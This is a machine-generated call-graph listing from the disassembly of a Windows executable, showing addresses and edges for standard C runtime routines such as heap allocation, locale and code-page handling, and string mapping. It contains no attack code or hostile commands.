40ce13 IsDebuggerPresent 14741->14743 14742->14693 14749 4138fc 14743->14749 14746 413706 SetUnhandledExceptionFilter UnhandledExceptionFilter 14747 413723 __invoke_watson 14746->14747 14748 41372b GetCurrentProcess TerminateProcess 14746->14748 14747->14748 14748->14693 14749->14746 14751 40e7d7 GetProcAddress 14750->14751 14752 40e7ec ExitProcess 14750->14752 14751->14752 14753 40e7e7 CorExitProcess 14751->14753 14753->14752 14755 40b900 14754->14755 14765 40b85f 14754->14765 14756 40d2e3 _malloc 6 API calls 14755->14756 14757 40b906 14756->14757 14758 40bfc1 __vsnprintf_l 62 API calls 14757->14758 14771 40b8f8 14758->14771 14759 40ec4d __FF_MSGBANNER 62 API calls 14762 40b870 14759->14762 14761 40eaa2 __NMSG_WRITE 62 API calls 14761->14762 14762->14759 14762->14761 14764 40e7ee __mtinitlocknum 4 API calls 14762->14764 14762->14765 14763 40b8bc RtlAllocateHeap 14763->14765 14764->14762 14765->14762 14765->14763 14766 40b8ec 14765->14766 14767 40d2e3 _malloc 6 API calls 14765->14767 14769 40b8f1 14765->14769 14765->14771 14772 40b7fe 14765->14772 14768 40bfc1 __vsnprintf_l 62 API calls 14766->14768 14767->14765 14768->14769 14770 40bfc1 __vsnprintf_l 62 API calls 14769->14770 14770->14771 14771->14667 14773 40b80a __ioinit 14772->14773 14774 40b83b __ioinit 14773->14774 14775 40d6e0 __lock 63 API calls 14773->14775 14774->14765 14776 40b820 14775->14776 14777 40def2 ___sbh_alloc_block 5 API calls 14776->14777 14778 40b82b 14777->14778 14780 40b844 14778->14780 14783 40d606 LeaveCriticalSection 14780->14783 14782 40b84b 14782->14774 14783->14782 14784->14671 14786 40daa0 HeapAlloc 14785->14786 14787 40da6c HeapReAlloc 14785->14787 14788 40da8a 14786->14788 14790 40dac3 VirtualAlloc 14786->14790 14787->14788 14789 40da8e 14787->14789 14788->14556 14789->14786 14790->14788 14791 40dadd HeapFree 14790->14791 14791->14788 14793 40db20 VirtualAlloc 14792->14793 14795 40db67 14793->14795 14795->14560 14796->14563 14797->14496 14816 40d606 LeaveCriticalSection 14798->14816 14800 41066c 14800->14506 14802 4145f0 InterlockedIncrement 14801->14802 14803 4145f3 14801->14803 14802->14803 14804 414600 14803->14804 14805 4145fd InterlockedIncrement 14803->14805 14806 41460a InterlockedIncrement 14804->14806 14807 41460d 14804->14807 14805->14804 14806->14807 14808 414617 InterlockedIncrement 14807->14808 14810 41461a 14807->14810 14808->14810 14809 414633 InterlockedIncrement 14809->14810 14810->14809 14811 414643 InterlockedIncrement 14810->14811 14812 41464e InterlockedIncrement 14810->14812 14811->14810 14812->14509 14817 40d606 LeaveCriticalSection 14813->14817 14815 4106ba 14815->14511 14816->14800 14817->14815 14818->14305 14821 41265c 14819->14821 14823 4126c9 14821->14823 14829 416836 14821->14829 14822 4127c7 14822->14351 14822->14352 14823->14822 14824 416836 73 API calls _parse_cmdline 14823->14824 14824->14823 14826 414474 14825->14826 14827 41447b 14825->14827 15051 4142d1 14826->15051 14827->14345 14832 4167e3 14829->14832 14835 40ec86 14832->14835 14836 40ec99 14835->14836 14839 40ece6 14835->14839 14843 410735 14836->14843 14839->14821 14841 40ecc6 14841->14839 14863 413fcc 14841->14863 14844 4106bc __getptd_noexit 63 API calls 14843->14844 14845 41073d 14844->14845 14846 40ec9e 14845->14846 14847 40e79a __amsg_exit 63 API calls 14845->14847 14846->14841 14848 414738 14846->14848 14847->14846 14849 414744 __ioinit 14848->14849 14850 410735 __getptd 63 API calls 14849->14850 14851 414749 14850->14851 14852 414777 14851->14852 14853 41475b 14851->14853 14854 40d6e0 __lock 63 API calls 14852->14854 14855 410735 __getptd 63 API calls 14853->14855 14856 41477e 14854->14856 14857 414760 14855->14857 14879 4146fa 14856->14879 14861 41476e __ioinit 14857->14861 14862 40e79a __amsg_exit 63 API calls 14857->14862 14861->14841 14862->14861 14864 413fd8 __ioinit 14863->14864 14865 410735 __getptd 63 API calls 14864->14865 14866 413fdd 14865->14866 14867 40d6e0 __lock 63 API calls 14866->14867 14868 413fef 14866->14868 14869 41400d 14867->14869 14872 40e79a __amsg_exit 63 API calls 14868->14872 14875 413ffd __ioinit 14868->14875 14870 414056 14869->14870 14873 414024 InterlockedDecrement 14869->14873 14874 41403e InterlockedIncrement 14869->14874 15047 414067 14870->15047 14872->14875 14873->14874 14876 41402f 14873->14876 14874->14870 14875->14839 14876->14874 14877 40b6b5 __crtGetStringTypeA_stat 63 API calls 14876->14877 14878 41403d 14877->14878 14878->14874 14880 4146fe 14879->14880 14886 414730 14879->14886 14881 4145d2 ___addlocaleref 8 API calls 14880->14881 14880->14886 14882 414711 14881->14882 14882->14886 14890 414661 14882->14890 14887 4147a2 14886->14887 15046 40d606 LeaveCriticalSection 14887->15046 14889 4147a9 14889->14857 14891 414672 InterlockedDecrement 14890->14891 14892 4146f5 14890->14892 14893 414687 InterlockedDecrement 14891->14893 14894 41468a 14891->14894 14892->14886 14904 414489 14892->14904 14893->14894 14895 414694 InterlockedDecrement 14894->14895 14896 414697 14894->14896 14895->14896 14897 4146a1 InterlockedDecrement 14896->14897 14898 4146a4 14896->14898 14897->14898 14899 4146ae InterlockedDecrement 14898->14899 14901 4146b1 14898->14901 14899->14901 14900 4146ca InterlockedDecrement 14900->14901 14901->14900 14902 4146da InterlockedDecrement 14901->14902 14903 4146e5 InterlockedDecrement 14901->14903 14902->14901 14903->14892 14905 41450d 14904->14905 14908 4144a0 14904->14908 14906 41455a 14905->14906 14907 40b6b5 __crtGetStringTypeA_stat 63 API calls 14905->14907 14924 414581 14906->14924 14958 417667 14906->14958 14909 41452e 14907->14909 14908->14905 14911 4144d4 14908->14911 14916 40b6b5 __crtGetStringTypeA_stat 63 API calls 14908->14916 14913 40b6b5 __crtGetStringTypeA_stat 63 API calls 14909->14913 14914 4144f5 14911->14914 14923 40b6b5 __crtGetStringTypeA_stat 63 API calls 14911->14923 14918 414541 14913->14918 14919 40b6b5 __crtGetStringTypeA_stat 63 API calls 14914->14919 14915 40b6b5 __crtGetStringTypeA_stat 63 API calls 14915->14924 14920 4144c9 14916->14920 14917 4145c6 14921 40b6b5 __crtGetStringTypeA_stat 63 API calls 14917->14921 14922 40b6b5 __crtGetStringTypeA_stat 63 API calls 14918->14922 14925 414502 14919->14925 14934 417841 14920->14934 14927 4145cc 14921->14927 14928 41454f 14922->14928 14929 4144ea 14923->14929 14924->14917 14930 40b6b5 63 API calls __crtGetStringTypeA_stat 14924->14930 14931 40b6b5 __crtGetStringTypeA_stat 63 API calls 14925->14931 14927->14886 14932 40b6b5 __crtGetStringTypeA_stat 63 API calls 14928->14932 14950 4177fc 14929->14950 14930->14924 14931->14905 14932->14906 14935 4178cb 14934->14935 14936 41784e 14934->14936 14935->14911 14937 41785f 14936->14937 14938 40b6b5 __crtGetStringTypeA_stat 63 API calls 14936->14938 14939 417871 14937->14939 14940 40b6b5 __crtGetStringTypeA_stat 63 API calls 14937->14940 14938->14937 14941 417883 14939->14941 14942 40b6b5 __crtGetStringTypeA_stat 63 API calls 14939->14942 14940->14939 14943 417895 14941->14943 14945 40b6b5 __crtGetStringTypeA_stat 63 API calls 14941->14945 14942->14941 14944 4178a7 14943->14944 14946 40b6b5 __crtGetStringTypeA_stat 63 API calls 14943->14946 14947 4178b9 14944->14947 14948 40b6b5 __crtGetStringTypeA_stat 63 API calls 14944->14948 14945->14943 14946->14944 14947->14935 14949 40b6b5 __crtGetStringTypeA_stat 63 API calls 14947->14949 14948->14947 14949->14935 14951 417809 14950->14951 14952 41783d 14950->14952 14953 417819 14951->14953 14954 40b6b5 __crtGetStringTypeA_stat 63 API calls 14951->14954 14952->14914 14955 41782b 14953->14955 14956 40b6b5 __crtGetStringTypeA_stat 63 API calls 14953->14956 14954->14953 14955->14952 14957 40b6b5 __crtGetStringTypeA_stat 63 API calls 14955->14957 14956->14955 14957->14952 14959 417678 14958->14959 15045 41457a 14958->15045 14960 40b6b5 __crtGetStringTypeA_stat 63 API calls 14959->14960 14961 417680 14960->14961 14962 40b6b5 __crtGetStringTypeA_stat 63 API calls 14961->14962 14963 417688 14962->14963 14964 40b6b5 __crtGetStringTypeA_stat 63 API calls 14963->14964 14965 417690 14964->14965 14966 40b6b5 __crtGetStringTypeA_stat 63 API calls 14965->14966 14967 417698 14966->14967 14968 40b6b5 __crtGetStringTypeA_stat 63 API calls 14967->14968 14969 4176a0 14968->14969 14970 40b6b5 __crtGetStringTypeA_stat 63 API calls 14969->14970 14971 4176a8 14970->14971 14972 40b6b5 __crtGetStringTypeA_stat 63 API calls 14971->14972 14973 4176af 14972->14973 14974 40b6b5 __crtGetStringTypeA_stat 63 API calls 14973->14974 14975 4176b7 14974->14975 14976 40b6b5 __crtGetStringTypeA_stat 63 API calls 14975->14976 14977 4176bf 14976->14977 14978 40b6b5 __crtGetStringTypeA_stat 63 API calls 14977->14978 14979 4176c7 14978->14979 14980 40b6b5 __crtGetStringTypeA_stat 63 API calls 14979->14980 14981 4176cf 14980->14981 14982 40b6b5 __crtGetStringTypeA_stat 63 API calls 14981->14982 14983 4176d7 14982->14983 14984 40b6b5 __crtGetStringTypeA_stat 63 API calls 14983->14984 14985 4176df 14984->14985 14986 40b6b5 __crtGetStringTypeA_stat 63 API calls 14985->14986 14987 4176e7 14986->14987 14988 40b6b5 __crtGetStringTypeA_stat 63 API calls 14987->14988 14989 4176ef 14988->14989 14990 40b6b5 __crtGetStringTypeA_stat 63 API calls 14989->14990 14991 4176f7 14990->14991 14992 40b6b5 __crtGetStringTypeA_stat 63 API calls 14991->14992 14993 417702 14992->14993 14994 40b6b5 __crtGetStringTypeA_stat 63 API calls 14993->14994 14995 41770a 14994->14995 14996 40b6b5 __crtGetStringTypeA_stat 63 API calls 14995->14996 14997 417712 14996->14997 14998 40b6b5 __crtGetStringTypeA_stat 63 API calls 14997->14998 14999 41771a 14998->14999 15000 40b6b5 __crtGetStringTypeA_stat 63 API calls 14999->15000 15001 417722 15000->15001 15002 40b6b5 __crtGetStringTypeA_stat 63 API calls 15001->15002 15003 41772a 15002->15003 15004 40b6b5 __crtGetStringTypeA_stat 63 API calls 15003->15004 15005 417732 15004->15005 15006 40b6b5 __crtGetStringTypeA_stat 63 API calls 15005->15006 15007 41773a 15006->15007 15008 40b6b5 __crtGetStringTypeA_stat 63 API calls 15007->15008 15009 417742 15008->15009 15010 40b6b5 __crtGetStringTypeA_stat 63 API calls 15009->15010 15011 41774a 15010->15011 15012 40b6b5 __crtGetStringTypeA_stat 63 API calls 15011->15012 15013 417752 15012->15013 15014 40b6b5 __crtGetStringTypeA_stat 63 API calls 15013->15014 15015 41775a 15014->15015 15016 40b6b5 __crtGetStringTypeA_stat 63 API calls 15015->15016 15017 417762 15016->15017 15018 40b6b5 __crtGetStringTypeA_stat 63 API calls 15017->15018 15019 41776a 15018->15019 15020 40b6b5 __crtGetStringTypeA_stat 63 API calls 15019->15020 15021 417772 15020->15021 15022 40b6b5 __crtGetStringTypeA_stat 63 API calls 15021->15022 15023 41777a 15022->15023 15024 40b6b5 __crtGetStringTypeA_stat 63 API calls 15023->15024 15025 417788 15024->15025 15026 40b6b5 __crtGetStringTypeA_stat 63 API calls 15025->15026 15027 417793 15026->15027 15028 40b6b5 __crtGetStringTypeA_stat 63 API calls 15027->15028 15029 41779e 15028->15029 15030 40b6b5 __crtGetStringTypeA_stat 63 API calls 15029->15030 15031 4177a9 15030->15031 15032 40b6b5 __crtGetStringTypeA_stat 63 API calls 15031->15032 15033 4177b4 15032->15033 15034 40b6b5 __crtGetStringTypeA_stat 63 API calls 15033->15034 15035 4177bf 15034->15035 15036 40b6b5 __crtGetStringTypeA_stat 63 API calls 15035->15036 15037 4177ca 15036->15037 15038 40b6b5 __crtGetStringTypeA_stat 63 API calls 15037->15038 15039 4177d5 15038->15039 15040 40b6b5 __crtGetStringTypeA_stat 63 API calls 15039->15040 15041 4177e0 15040->15041 15042 40b6b5 __crtGetStringTypeA_stat 63 API calls 15041->15042 15043 4177eb 15042->15043 15044 40b6b5 __crtGetStringTypeA_stat 63 API calls 15043->15044 15044->15045 15045->14915 15046->14889 15050 40d606 LeaveCriticalSection 15047->15050 15049 41406e 15049->14868 15050->15049 15052 4142dd __ioinit 15051->15052 15053 410735 __getptd 63 API calls 15052->15053 15054 4142e6 15053->15054 15055 413fcc _LocaleUpdate::_LocaleUpdate 65 API calls 15054->15055 15056 4142f0 15055->15056 15082 414070 15056->15082 15059 411c75 __malloc_crt 63 API calls 15060 414311 15059->15060 15061 414430 __ioinit 15060->15061 15089 4140ec 15060->15089 15061->14827 15064 414341 InterlockedDecrement 15066 414351 15064->15066 15067 414362 InterlockedIncrement 15064->15067 15065 41443d 15065->15061 15068 414450 15065->15068 15070 40b6b5 __crtGetStringTypeA_stat 63 API calls 15065->15070 15066->15067 15072 40b6b5 __crtGetStringTypeA_stat 63 API calls 15066->15072 15067->15061 15069 414378 15067->15069 15071 40bfc1 __vsnprintf_l 63 API calls 15068->15071 15069->15061 15074 40d6e0 __lock 63 API calls 15069->15074 15070->15068 15071->15061 15073 414361 15072->15073 15073->15067 15076 41438c InterlockedDecrement 15074->15076 15077 414408 15076->15077 15078 41441b InterlockedIncrement 15076->15078 15077->15078 15080 40b6b5 __crtGetStringTypeA_stat 63 API calls 15077->15080 15099 414432 15078->15099 15081 41441a 15080->15081 15081->15078 15083 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15082->15083 15084 414084 15083->15084 15085 4140ad 15084->15085 15086 41408f GetOEMCP 15084->15086 15087 4140b2 GetACP 15085->15087 15088 41409f 15085->15088 15086->15088 15087->15088 15088->15059 15088->15061 15090 414070 getSystemCP 75 API calls 15089->15090 15091 41410c 15090->15091 15092 414117 setSBCS 15091->15092 15095 41415b IsValidCodePage 15091->15095 15098 414180 _memset __setmbcp_nolock 15091->15098 15093 40ce09 __crtGetStringTypeA_stat 5 API calls 15092->15093 15094 4142cf 15093->15094 15094->15064 15094->15065 15095->15092 15096 41416d GetCPInfo 15095->15096 15096->15092 15096->15098 15102 413e39 GetCPInfo 15098->15102 15235 40d606 LeaveCriticalSection 15099->15235 15101 414439 15101->15061 15104 413e6d _memset 15102->15104 15111 413f1f 15102->15111 15112 417625 15104->15112 15106 40ce09 __crtGetStringTypeA_stat 5 API calls 15108 413fca 15106->15108 15108->15098 15110 417426 ___crtLCMapStringA 98 API calls 15110->15111 15111->15106 15113 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15112->15113 15114 417638 15113->15114 15122 41746b 15114->15122 15117 417426 15118 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15117->15118 15119 417439 15118->15119 15188 417081 15119->15188 15123 4174b7 15122->15123 15124 41748c GetStringTypeW 15122->15124 15125 41759e 15123->15125 15126 4174a4 15123->15126 15124->15126 15127 4174ac GetLastError 15124->15127 15150 417a20 GetLocaleInfoA 15125->15150 15128 4174f0 MultiByteToWideChar 15126->15128 15145 417598 15126->15145 15127->15123 15134 41751d 15128->15134 15128->15145 15131 40ce09 __crtGetStringTypeA_stat 5 API calls 15132 413eda 15131->15132 15132->15117 15133 4175ef GetStringTypeA 15137 41760a 15133->15137 15133->15145 15138 417532 _memset __crtGetStringTypeA_stat 15134->15138 15139 40b84d _malloc 63 API calls 15134->15139 15136 41756b MultiByteToWideChar 15141 417581 GetStringTypeW 15136->15141 15142 417592 15136->15142 15143 40b6b5 __crtGetStringTypeA_stat 63 API calls 15137->15143 15138->15136 15138->15145 15139->15138 15141->15142 15146 4147ae 15142->15146 15143->15145 15145->15131 15147 4147ba 15146->15147 15148 4147cb 15146->15148 15147->15148 15149 40b6b5 __crtGetStringTypeA_stat 63 API calls 15147->15149 15148->15145 15149->15148 15151 417a53 15150->15151 15152 417a4e 15150->15152 15181 416f54 15151->15181 15154 40ce09 __crtGetStringTypeA_stat 5 API calls 15152->15154 15155 4175c2 15154->15155 15155->15133 15155->15145 15156 417a69 15155->15156 15157 417aa9 GetCPInfo 15156->15157 15158 417b33 15156->15158 15159 417ac0 15157->15159 15160 417b1e MultiByteToWideChar 15157->15160 15161 40ce09 __crtGetStringTypeA_stat 5 API calls 15158->15161 15159->15160 15162 417ac6 GetCPInfo 15159->15162 15160->15158 15165 417ad9 _strlen 15160->15165 15163 4175e3 15161->15163 15162->15160 15164 417ad3 15162->15164 15163->15133 15163->15145 15164->15160 15164->15165 15166 40b84d _malloc 63 API calls 15165->15166 15169 417b0b _memset __crtGetStringTypeA_stat 15165->15169 15166->15169 15167 417b68 MultiByteToWideChar 15168 417b80 15167->15168 15180 417b9f 15167->15180 15171 417ba4 15168->15171 15172 417b87 WideCharToMultiByte 15168->15172 15169->15158 15169->15167 15170 4147ae __freea 63 API calls 15170->15158 15173 417bc3 15171->15173 15174 417baf WideCharToMultiByte 15171->15174 15172->15180 15175 411cba __calloc_crt 63 API calls 15173->15175 15174->15173 15174->15180 15176 417bcb 15175->15176 15177 417bd4 WideCharToMultiByte 15176->15177 15176->15180 15178 417be6 15177->15178 15177->15180 15179 40b6b5 __crtGetStringTypeA_stat 63 API calls 15178->15179 15179->15180 15180->15170 15184 41a354 15181->15184 15185 41a36d 15184->15185 15186 41a125 strtoxl 87 API calls 15185->15186 15187 416f65 15186->15187 15187->15152 15189 4170a2 LCMapStringW 15188->15189 15192 4170bd 15188->15192 15190 4170c5 GetLastError 15189->15190 15189->15192 15190->15192 15191 4172bb 15195 417a20 ___ansicp 87 API calls 15191->15195 15192->15191 15193 417117 15192->15193 15194 417130 MultiByteToWideChar 15193->15194 15217 4172b2 15193->15217 15203 41715d 15194->15203 15194->15217 15196 4172e3 15195->15196 15199 4173d7 LCMapStringA 15196->15199 15200 4172fc 15196->15200 15196->15217 15197 40ce09 __crtGetStringTypeA_stat 5 API calls 15198 413efa 15197->15198 15198->15110 15234 417333 15199->15234 15201 417a69 ___convertcp 70 API calls 15200->15201 15206 41730e 15201->15206 15202 4171ae MultiByteToWideChar 15207 4171c7 LCMapStringW 15202->15207 15229 4172a9 15202->15229 15205 40b84d _malloc 63 API calls 15203->15205 15212 417176 __crtGetStringTypeA_stat 15203->15212 15204 4173fe 15215 40b6b5 __crtGetStringTypeA_stat 63 API calls 15204->15215 15204->15217 15205->15212 15209 417318 LCMapStringA 15206->15209 15206->15217 15211 4171e8 15207->15211 15207->15229 15208 40b6b5 __crtGetStringTypeA_stat 63 API calls 15208->15204 15219 41733a 15209->15219 15209->15234 15210 4147ae __freea 63 API calls 15210->15217 15213 4171f1 15211->15213 15218 41721a 15211->15218 15212->15202 15212->15217 15216 417203 LCMapStringW 15213->15216 15213->15229 15214 417235 __crtGetStringTypeA_stat 15220 417269 LCMapStringW 15214->15220 15214->15229 15215->15217 15216->15229 15217->15197 15218->15214 15224 40b84d _malloc 63 API calls 15218->15224 15221 40b84d _malloc 63 API calls 15219->15221 15223 41734b _memset __crtGetStringTypeA_stat 15219->15223 15222 4172a3 15220->15222 15225 417281 WideCharToMultiByte 15220->15225 15221->15223 15226 4147ae __freea 63 API calls 15222->15226 15227 417389 LCMapStringA 15223->15227 15223->15234 15224->15214 15225->15222 15226->15229 15230 4173a5 15227->15230 15231 4173a9 15227->15231 15229->15210 15233 4147ae __freea 63 API calls 15230->15233 15232 417a69 ___convertcp 70 API calls 15231->15232 15232->15230 15233->15234 15234->15204 15234->15208 15235->15101 15237 41358c 15236->15237 15238 41046e __encode_pointer 6 API calls 15237->15238 15239 4135a4 15237->15239 15238->15237 15239->14375 15243 40d281 15240->15243 15242 40d2ca 15242->14377 15244 40d28d __ioinit 15243->15244 15251 40e806 15244->15251 15250 40d2ae __ioinit 15250->15242 15252 40d6e0 __lock 63 API calls 15251->15252 15253 40d292 15252->15253 15254 40d196 15253->15254 15255 4104e9 __decode_pointer 6 API calls 15254->15255 15256 40d1aa 15255->15256 15257 4104e9 __decode_pointer 6 API calls 15256->15257 15258 40d1ba 15257->15258 15266 40d23d 15258->15266 15274 40e56a 15258->15274 15260 41046e __encode_pointer 6 API calls 15262 40d232 15260->15262 15261 40d1d8 15264 40d1fc 15261->15264 15270 40d224 15261->15270 15287 411d06 15261->15287 15265 41046e __encode_pointer 6 API calls 15262->15265 15264->15266 15267 411d06 __realloc_crt 73 API calls 15264->15267 15268 40d212 15264->15268 15265->15266 15271 40d2b7 15266->15271 15267->15268 15268->15266 15269 41046e __encode_pointer 6 API calls 15268->15269 15269->15270 15270->15260 15336 40e80f 15271->15336 15275 40e576 __ioinit 15274->15275 15276 40e5a3 15275->15276 15277 40e586 15275->15277 15279 40e5e4 HeapSize 15276->15279 15280 40d6e0 __lock 63 API calls 15276->15280 15278 40bfc1 __vsnprintf_l 63 API calls 15277->15278 15281 40e58b 15278->15281 15283 40e59b __ioinit 15279->15283 15284 40e5b3 ___sbh_find_block 15280->15284 15282 40e744 __vsnprintf_l 6 API calls 15281->15282 15282->15283 15283->15261 15292 40e604 15284->15292 15291 411d0f 15287->15291 15289 411d4e 15289->15264 15290 411d2f Sleep 15290->15291 15291->15289 15291->15290 15296 40e34f 15291->15296 15295 40d606 LeaveCriticalSection 15292->15295 15294 40e5df 15294->15279 15294->15283 15295->15294 15297 40e35b __ioinit 15296->15297 15298 40e370 15297->15298 15299 40e362 15297->15299 15301 40e383 15298->15301 15302 40e377 15298->15302 15300 40b84d _malloc 63 API calls 15299->15300 15305 40e36a __dosmaperr __ioinit 15300->15305 15310 40e4f5 15301->15310 15318 40e390 ___sbh_resize_block ___sbh_find_block ___crtGetEnvironmentStringsA 15301->15318 15303 40b6b5 __crtGetStringTypeA_stat 63 API calls 15302->15303 15303->15305 15304 40e528 15306 40d2e3 _malloc 6 API calls 15304->15306 15305->15291 15309 40e52e 15306->15309 15307 40d6e0 __lock 63 API calls 15307->15318 15308 40e4fa HeapReAlloc 15308->15305 15308->15310 15311 40bfc1 __vsnprintf_l 63 API calls 15309->15311 15310->15304 15310->15308 15312 40e54c 15310->15312 15313 40d2e3 _malloc 6 API calls 15310->15313 15315 40e542 15310->15315 15311->15305 15312->15305 15314 40bfc1 __vsnprintf_l 63 API calls 15312->15314 15313->15310 15316 40e555 GetLastError 15314->15316 15319 40bfc1 __vsnprintf_l 63 API calls 15315->15319 15316->15305 15318->15304 15318->15305 15318->15307 15320 40e41b HeapAlloc 15318->15320 15321 40e470 HeapReAlloc 15318->15321 15323 40def2 ___sbh_alloc_block 5 API calls 15318->15323 15324 40e4db 15318->15324 15325 40d2e3 _malloc 6 API calls 15318->15325 15328 40e4be 15318->15328 15331 40d743 __VEC_memcpy VirtualFree VirtualFree HeapFree ___sbh_free_block 15318->15331 15332 40e493 15318->15332 15330 40e4c3 15319->15330 15320->15318 15321->15318 15322 40e4c8 GetLastError 15322->15305 15323->15318 15324->15305 15326 40bfc1 __vsnprintf_l 63 API calls 15324->15326 15325->15318 15327 40e4e8 15326->15327 15327->15305 15327->15316 15329 40bfc1 __vsnprintf_l 63 API calls 15328->15329 15329->15330 15330->15305 15330->15322 15331->15318 15335 40d606 LeaveCriticalSection 15332->15335 15334 40e49a 15334->15318 15335->15334 15339 40d606 LeaveCriticalSection 15336->15339 15338 40d2bc 15338->15250 15339->15338 15342 40b9aa __ioinit _strnlen 15340->15342 15341 40b9b8 15343 40bfc1 __vsnprintf_l 63 API calls 15341->15343 15342->15341 15346 40b9ec 15342->15346 15344 40b9bd 15343->15344 15345 40e744 __vsnprintf_l 6 API calls 15344->15345 15351 40b9cd __ioinit 15345->15351 15347 40d6e0 __lock 63 API calls 15346->15347 15348 40b9f3 15347->15348 15397 40b917 15348->15397 15351->14381 15354 4017cc ___crtGetEnvironmentStringsA 15353->15354 15354->14385 15357 40af70 15355->15357 15356 40b84d _malloc 63 API calls 15356->15357 15357->15356 15358 40af8a 15357->15358 15359 40d2e3 _malloc 6 API calls 15357->15359 15360 40af8c std::bad_alloc::bad_alloc 15357->15360 15358->14390 15359->15357 15363 40d2bd __cinit 74 API calls 15360->15363 15365 40afb2 15360->15365 15363->15365 15611 40af49 15365->15611 15366 40afca 15368 401903 lstrlenA 15367->15368 15369 4018fc 15367->15369 15623 4017e0 15368->15623 15369->14413 15372 401940 GetLastError 15374 40194b MultiByteToWideChar 15372->15374 15375 40198d 15372->15375 15373 401996 15373->14413 15376 4017e0 78 API calls 15374->15376 15375->15373 15639 401030 GetLastError 15375->15639 15378 401970 MultiByteToWideChar 15376->15378 15378->15375 15380 40af66 75 API calls 15379->15380 15381 40187c 15380->15381 15382 401885 SysAllocString 15381->15382 15383 4018a4 15381->15383 15382->15383 15383->14415 15385 40231a SafeArrayUnaccessData 15384->15385 15385->14422 15387 4019df VariantClear 15386->15387 15388 4019aa InterlockedDecrement 15386->15388 15387->14429 15388->15387 15389 4019b8 15388->15389 15389->15387 15390 4019c2 SysFreeString 15389->15390 15391 4019c9 15389->15391 15390->15391 15648 40aec0 15391->15648 15394 401571 15393->15394 15396 401582 15393->15396 15654 40afe0 15394->15654 15396->14393 15398 40b930 15397->15398 15399 40b92c 15397->15399 15398->15399 15400 40b942 _strlen 15398->15400 15406 40eeab 15398->15406 15403 40ba18 15399->15403 15400->15399 15416 40edfb 15400->15416 15610 40d606 LeaveCriticalSection 15403->15610 15405 40ba1f 15405->15351 15413 40ef2b 15406->15413 15414 40eec6 15406->15414 15407 40eecc WideCharToMultiByte 15407->15413 15407->15414 15408 411cba __calloc_crt 63 API calls 15408->15414 15409 40eeef WideCharToMultiByte 15410 40ef37 15409->15410 15409->15414 15411 40b6b5 __crtGetStringTypeA_stat 63 API calls 15410->15411 15411->15413 15413->15400 15414->15407 15414->15408 15414->15409 15414->15413 15415 40b6b5 __crtGetStringTypeA_stat 63 API calls 15414->15415 15419 414d44 15414->15419 15415->15414 15511 40ed0d 15416->15511 15420 414d76 15419->15420 15421 414d59 15419->15421 15423 414dd4 15420->15423 15465 417e7e 15420->15465 15422 40bfc1 __vsnprintf_l 63 API calls 15421->15422 15424 414d5e 15422->15424 15425 40bfc1 __vsnprintf_l 63 API calls 15423->15425 15427 40e744 __vsnprintf_l 6 API calls 15424->15427 15428 414d6e 15425->15428 15427->15428 15428->15414 15430 414db5 15432 414e12 15430->15432 15433 414de7 15430->15433 15434 414dcb 15430->15434 15432->15428 15476 414c98 15432->15476 15433->15428 15438 411c75 __malloc_crt 63 API calls 15433->15438 15436 40eeab ___wtomb_environ 120 API calls 15434->15436 15439 414dd0 15436->15439 15441 414df7 15438->15441 15439->15423 15439->15432 15440 414e8f 15442 414f7a 15440->15442 15448 414e98 15440->15448 15441->15428 15441->15432 15447 411c75 __malloc_crt 63 API calls 15441->15447 15444 40b6b5 __crtGetStringTypeA_stat 63 API calls 15442->15444 15443 414e41 15445 40b6b5 __crtGetStringTypeA_stat 63 API calls 15443->15445 15444->15428 15446 414e4b 15445->15446 15452 414e51 _strlen 15446->15452 15480 411d54 15446->15480 15447->15432 15448->15428 15449 411d54 __recalloc_crt 74 API calls 15448->15449 15449->15452 15450 414f5e 15450->15428 15453 40b6b5 __crtGetStringTypeA_stat 63 API calls 15450->15453 15452->15428 15452->15450 15454 411cba __calloc_crt 63 API calls 15452->15454 15453->15428 15455 414efb _strlen 15454->15455 15455->15450 15456 40ef42 _strcpy_s 63 API calls 15455->15456 15457 414f14 15456->15457 15458 414f28 SetEnvironmentVariableA 15457->15458 15459 40e61c __invoke_watson 10 API calls 15457->15459 15460 414f49 15458->15460 15461 414f52 15458->15461 15462 414f25 15459->15462 15463 40bfc1 __vsnprintf_l 63 API calls 15460->15463 15464 40b6b5 __crtGetStringTypeA_stat 63 API calls 15461->15464 15462->15458 15463->15461 15464->15450 15485 417dc2 15465->15485 15467 414d89 15467->15423 15467->15430 15468 414cea 15467->15468 15469 414cfb 15468->15469 15473 414d3b 15468->15473 15470 411cba __calloc_crt 63 API calls 15469->15470 15471 414d12 15470->15471 15472 40e79a __amsg_exit 63 API calls 15471->15472 15474 414d24 15471->15474 15472->15474 15473->15430 15474->15473 15492 417d6d 15474->15492 15477 414ca6 15476->15477 15478 40edfb __fassign 107 API calls 15477->15478 15479 414ccd 15477->15479 15478->15477 15479->15440 15479->15443 15483 411d5d 15480->15483 15482 411da0 15482->15452 15483->15482 15484 411d81 Sleep 15483->15484 15500 40b783 15483->15500 15484->15483 15486 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15485->15486 15487 417dd6 15486->15487 15488 40bfc1 __vsnprintf_l 63 API calls 15487->15488 15491 417df4 __mbschr_l 15487->15491 15489 417de4 15488->15489 15490 40e744 __vsnprintf_l 6 API calls 15489->15490 15490->15491 15491->15467 15493 417d7e _strlen 15492->15493 15499 417d7a 15492->15499 15494 40b84d _malloc 63 API calls 15493->15494 15495 417d91 15494->15495 15496 40ef42 _strcpy_s 63 API calls 15495->15496 15495->15499 15497 417da3 15496->15497 15498 40e61c __invoke_watson 10 API calls 15497->15498 15497->15499 15498->15499 15499->15474 15501 40b792 15500->15501 15502 40b7ba 15500->15502 15501->15502 15503 40b79e 15501->15503 15504 40b7cf 15502->15504 15505 40e56a __msize 64 API calls 15502->15505 15507 40bfc1 __vsnprintf_l 63 API calls 15503->15507 15506 40e34f _realloc 72 API calls 15504->15506 15505->15504 15510 40b7b3 _memset 15506->15510 15508 40b7a3 15507->15508 15509 40e744 __vsnprintf_l 6 API calls 15508->15509 15509->15510 15510->15483 15512 40ec86 _LocaleUpdate::_LocaleUpdate 73 API calls 15511->15512 15513 40ed21 15512->15513 15514 40ed2a 15513->15514 15515 40ed42 15513->15515 15517 40ed75 15513->15517 15514->15400 15516 40bfc1 __vsnprintf_l 63 API calls 15515->15516 15518 40ed47 15516->15518 15519 40ed99 15517->15519 15520 40ed7f 15517->15520 15523 40e744 __vsnprintf_l 6 API calls 